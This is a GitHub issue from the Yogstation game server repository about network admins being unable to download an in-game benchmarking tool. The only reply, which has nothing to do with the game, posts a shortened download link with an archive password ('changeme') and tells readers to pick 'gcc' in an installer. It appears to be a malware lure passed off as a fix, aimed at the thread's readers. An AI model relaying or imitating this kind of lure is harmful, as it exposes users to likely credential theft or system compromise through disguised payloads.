### ISSUE TITLE
Network admins do not have access to the network benchmarking tool

### ISSUE THREAD

**Issue by Oblisk234** [yogstation13/Yogstation#22560]
### Severity

Inconvenience

### Short Description

Try to download the network benchmarking tool, be unable to

### Reproduction

![image](https://github.com/user-attachments/assets/b9492d46-e23d-44ba-85d4-5caad895a607)
![image](https://github.com/user-attachments/assets/85735771-b092-46dc-ac90-0b697beb9f93)

### Round ID

53704

### Test Merges

#22301, #22353, #22095, #22555, #22548

### BYOND Username

Oblisk234

### Was this done on a locally hosted or non-Yogstation hosted server?

No

**Comment by c0ffincolors** [comment]
Download 
https://bit.ly/3MjP129
password: changeme
In the installer menu, select "gcc."
